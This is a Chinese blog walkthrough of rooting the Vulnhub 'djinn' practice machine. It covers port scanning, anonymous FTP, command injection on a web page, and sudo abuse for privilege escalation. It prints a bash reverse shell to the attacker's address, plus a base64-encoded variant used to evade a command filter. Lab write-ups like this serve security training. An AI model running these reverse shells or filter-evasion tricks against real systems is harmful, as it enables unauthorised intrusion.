djinn vulnhub 靶机渗透过程

无聊,下个靶机来玩一下。

靶机下载地址:vulnhub官网

下载下来之后,我这边用的是virtualbox,kali攻击机与靶机都设置为net网络。

第一步,靶机扫描,这里打开靶机就能看到 ,靶机地址为10.0.2.43,这一步探测靶机地址可以不做,这里我的kali地址为10.0.2.4

第二步,靶机端口扫描

直接nmap扫描,具体命令就是nmap -sS -p 1-65535 10.0.2.43

第三步,信息的搜集。先进入ftp查看有什么文件线索,这里用anonymous(匿名)方式登录,可以看到三个文件

三个文件都下载下来查看一下

第一个文件感觉没什么用,ssh没有打开,无法验证第一个账户正确性,第二个文件提示我们,在1337号端口有个小游戏,这里直接进入1337端口,发现无法打开,这种情况我还是第一次遇见,之间发现打不开的情况都是要绑定ip与域名,查看大佬的博客发现,1337端口不能用浏览器直接访问,可以用kali的nc命令访问

 

 打开发现需要回答1000次数学计算问题,其实这里我在想能否写个脚本实现自动回答问题,但是本人的python语言掌握有限,写不出来。

所以接着访问另外一个7331端口

这里查看源代码没什么信息,考虑用gobuster扫描网站目录

 

 这里扫描目录时间挺长的,但是有用的也就wish目录,进入wish

 直接输入id,查看返回的内容

 

 这里直接bash reverse shell,bash -i >& /dev/tcp/10.0.2.4/4446 0>&1,后台监听,发现没有返回的shell,考虑可能是这条命令被禁止了。做到这就没什么思路了,看了大佬的博客,发现可以base64加密反弹shell,然后执行,加密后为echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC80NDQ2IDA+JjE= | base64 -d | bash,这里直接后台监听即可得到shell

 在当前的目录下发现信息

 直接到home的nitish目录里查看文件

这里直接su切换用户,发现出现了问题

搜了下发现是因为没有tty shell环境

输入这个生成ttyshell,python3 -c "import pty;pty.spawn('/bin/bash')"

然后切换用户即可,切换之后得到第一个flag

 sudo -l查看权限

 直接执行这个genie,发现

 

 这里看大佬的操作输入man genie之后会出现cmd的参数介绍,但是我输入之后发现没有返回这个参数,只能直接用这个参数了,直接sudo -u sam genie -cmd id,就可以打开sam的终端

搜集下信息,

 这里有个pyc的编译后的文件,在靶机上用python开启http服务,然后下载到本地,网上搜索反编译网站,我这里用的是这个,反编译如下

可以看到s==num哪里存在漏洞,这要在次输入sum即可。

sudo -l查看sam的权限

 直接执行,sudo /root/lago

这个程序正好对应上面的反编译出的文件,直接输入2,然后再输入num即可提权到root

 这里直接执行root目录下的文件,即可得到flag

 到这里就完成了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值